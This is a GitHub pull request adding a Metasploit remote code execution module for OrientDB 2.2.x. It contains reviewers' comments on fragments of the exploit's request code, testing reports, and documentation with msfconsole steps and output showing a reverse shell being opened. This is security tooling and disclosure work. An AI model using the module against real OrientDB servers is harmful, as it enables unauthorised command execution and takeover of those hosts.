New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add OrientDB 2.2.x RCE Module #8736
Conversation
…sted the module against Win7-Pro-x64 with OrientDB v2.2.20 with StagerCmd flavors vbs and certutil with success
items.each do |item| | ||
request_parameters = { | ||
'method' => 'POST', | ||
'uri' => normalize_uri(@uri.path, "/command/#{targetdb}/sql/-/20?format=rid,type,version,class,graph"), |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Use vars_get
rather than appending the query string to the URL.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Now using vars_get on all requests.
def exploit | ||
@uri = target_uri | ||
@uri.path = normalize_uri(@uri.path) | ||
@uri.path << "/" if @uri.path[-1, 1] != "/" |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
If you're using normalize_uri
then in theory you shouldn't need to do this check for /
as normalize_uri
will take care of formatting the URL for you.
For example, {'uri' => normalize_uri(target_uri.path), 'listDatabases'}
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Removed redundant uri normalization checking
uri = target_uri | ||
uri.path = normalize_uri(uri.path) | ||
uri.path << "/" if uri.path[-1, 1] != "/" | ||
res = send_request_raw({'uri' => "#{uri.path}listDatabases"}) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Is there a reason you're using send_request_raw
rather than sen_request_cgi
? The latter is preferred.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I was having issues with the URL encoding. The exploit didn't work because of this. The "encode_params" resolved the issue and every request is now using send_request_cgi
…redundant uri normalization checking; Swapped send_request_raw for send_request_cgi; using vars_get;
Unfortunately this didn't work for me on Windows 7. Here's some output, printing the response from step 2 in
|
…iting windows boxes
Yeah I really need to use send_request_raw. The send_request_cgi encoding breaks the HTTP requests somehow for windows boxes. Using send_request_raw the exploit works on both linux and windows. |
Did you spot any more issues with the execution of the module? |
@ricardojba i'll see if i can take a look at this today |
Worked for me
...snip...
|
Just a heads up that i did some ninja patching to the documentation since this had been in the queue for so long. See here: e7aa06c#diff-a2827c36764dd349af0d4cbb8ba31623 Thanks for the patience! |
Release NotesThis module adds a remote code execution exploit for orientdb's web interface |
This module leverages a privilege escalation on OrientDB to execute unsandboxed OS commands.
All versions from 2.2.2 up to 2.2.22 should be vulnerable.
The module is based on the public PoC found here: https://blogs.securiteam.com/index.php/archives/3318
Vulnerable Application
OrientDB 2.2.2 <= 2.2.22
Installation
Download a vulnerable OrientDB version here: http://orientdb.com/download-previous/
$ wget http://orientdb.com/download.php?file=orientdb-community-2.2.20.zip&os=multi
$ unzip orientdb-community-2.2.20.zip
$ chmod 755 bin/*.sh
$ chmod -R 777 config
$ cd bin
$ ./server.sh
References for running OrientDB
http://orientdb.com/docs/2.0/orientdb.wiki/Tutorial-Installation.html
http://orientdb.com/docs/2.0/orientdb.wiki/Tutorial-Run-the-server.html
References for vulnerability
https://blogs.securiteam.com/index.php/archives/3318
http://www.palada.net/index.php/2017/07/13/news-2112/
https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#2223---july-11-2017
Verification Steps
msfconsole
use exploit/multi/http/orientdb_exec
set rhost <RHOST>
set target <TARGET_NUMBER>
set workspace <WORKSPACE>
check
run
Example Output
[LHOST:127.0.0.1][Workspace:default][Jobs:0][Sessions:0][/Users/vibrio] exploit(orientdb_exec) > run
[*] [2017.07.18-15:55:47] Started reverse TCP handler on 127.0.0.1:37331
[*] [2017.07.18-15:55:49] 127.0.0.1:2480 - Sending payload...
[*] Command shell session 1 opened (127.0.0.1:37331 -> 127.0.0.1:46594) at 2017-07-18 15:55:49 +0100